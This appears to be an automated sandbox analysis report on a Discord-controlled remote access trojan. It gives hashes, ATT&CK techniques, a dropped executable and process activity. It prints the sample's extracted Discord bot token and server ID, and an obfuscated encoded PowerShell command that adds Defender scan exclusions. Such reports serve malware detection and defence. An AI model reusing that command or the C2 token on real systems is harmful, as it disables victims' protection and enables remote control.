discordrat | 2aef08f79aaeb1372074b1e00665dcd4d684da64678d9afdf1c475b9604ea7a4

General

Target

1029384756.exe
Size

6.2MB
MD5

ff249060a98b9585eb011927c21bbf8e
SHA1

30cd2132d599fa50f53683d3c0d5a88c52f2b121
SHA256

2aef08f79aaeb1372074b1e00665dcd4d684da64678d9afdf1c475b9604ea7a4
SHA512

2d252af848934457d0b570a0d17381f83d67b3e22e845b4f295db410c978aa6d498a33844f3fc047b0b4f9b07f4cadeae0a147c04d92e4073a631423ac82aa7b
SSDEEP

196608:8QIML+4Y3yWU6fyzXVarvBWumtSlyZ20r6zYvGqpWs12:vIML+4Y3yWUgEumAWmzYvGJ

Score

10^/10

discordrat defense_evasion discovery persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTI4OTU5MTU3OTc0NDY2NTYwMQ.GeVN_G.B9uH1vpClVyq73820fXzo5z7HFsuew0uArUTHU
server_id
1289604307905413142

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Executes dropped EXE 1 IoCs

pid	Process
1132	0.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
5	discord.com
6	discord.com
9	discord.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\0.exe	1029384756.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1029384756.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3412	powershell.exe
3412	powershell.exe
3412	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1132	0.exe
Token: SeDebugPrivilege	3412	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 3428 wrote to memory of 3412	3428	1029384756.exe	73
PID 3428 wrote to memory of 3412	3428	1029384756.exe	73
PID 3428 wrote to memory of 3412	3428	1029384756.exe	73
PID 3428 wrote to memory of 1132	3428	1029384756.exe	75
PID 3428 wrote to memory of 1132	3428	1029384756.exe	75

C:\Users\Admin\AppData\Local\Temp\1029384756.exe
"C:\Users\Admin\AppData\Local\Temp\1029384756.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3428
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAeQB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAaQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAYwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAYQBwACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3412
- C:\Windows\0.exe
  "C:\Windows\0.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nwu5cep1.ca2.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Windows\0.exe

Filesize
78KB

MD5
1b9c81334aa2661c3be9bf1a12db2aae

SHA1
7ac337e1eb0adac85cf54a605183b25ba0a12fd4

SHA256
b020c31ce78bdf2200b9dadc61fd7ad0e34e3f9c05cf3724743ca9e58c7bec44

SHA512
73761d06a1945b608eb0c03f3da01149177b342cb2ecb50f9c2aedfce8d34bd1efc309fe13cb5d0ad128247ea9c060ce747f753dbfe2af31a16c729587aebdf9

Download Submit
memory/1132-5-0x000001F7FD7F0000-0x000001F7FD808000-memory.dmp

Filesize
96KB

Download
memory/1132-7-0x00007FFCAC3F3000-0x00007FFCAC3F4000-memory.dmp

Filesize
4KB

Download
memory/1132-8-0x000001F798000000-0x000001F7981C2000-memory.dmp

Filesize
1.8MB

Download
memory/1132-11-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

Filesize
9.9MB

Download
memory/1132-261-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

Filesize
9.9MB

Download
memory/1132-260-0x00007FFCAC3F3000-0x00007FFCAC3F4000-memory.dmp

Filesize
4KB

Download
memory/1132-14-0x000001F7989D0000-0x000001F798EF6000-memory.dmp

Filesize
5.1MB

Download
memory/3412-19-0x0000000008260000-0x000000000827C000-memory.dmp

Filesize
112KB

Download
memory/3412-38-0x00000000099C0000-0x00000000099F3000-memory.dmp

Filesize
204KB

Download
memory/3412-18-0x0000000008340000-0x0000000008690000-memory.dmp

Filesize
3.3MB

Download
memory/3412-16-0x0000000007AE0000-0x0000000007B46000-memory.dmp

Filesize
408KB

Download
memory/3412-20-0x0000000008DA0000-0x0000000008DEB000-memory.dmp

Filesize
300KB

Download
memory/3412-21-0x0000000008AD0000-0x0000000008B46000-memory.dmp

Filesize
472KB

Download
memory/3412-15-0x0000000007A40000-0x0000000007A62000-memory.dmp

Filesize
136KB

Download
memory/3412-17-0x00000000081D0000-0x0000000008236000-memory.dmp

Filesize
408KB

Download
memory/3412-39-0x00000000703C0000-0x000000007040B000-memory.dmp

Filesize
300KB

Download
memory/3412-40-0x0000000009990000-0x00000000099AE000-memory.dmp

Filesize
120KB

Download
memory/3412-45-0x0000000009A00000-0x0000000009AA5000-memory.dmp

Filesize
660KB

Download
memory/3412-46-0x0000000009ED0000-0x0000000009F64000-memory.dmp

Filesize
592KB

Download
memory/3412-239-0x0000000009E70000-0x0000000009E8A000-memory.dmp

Filesize
104KB

Download
memory/3412-244-0x0000000009E60000-0x0000000009E68000-memory.dmp

Filesize
32KB

Download
memory/3412-13-0x0000000007BA0000-0x00000000081C8000-memory.dmp

Filesize
6.2MB

Download
memory/3412-12-0x0000000005300000-0x0000000005336000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing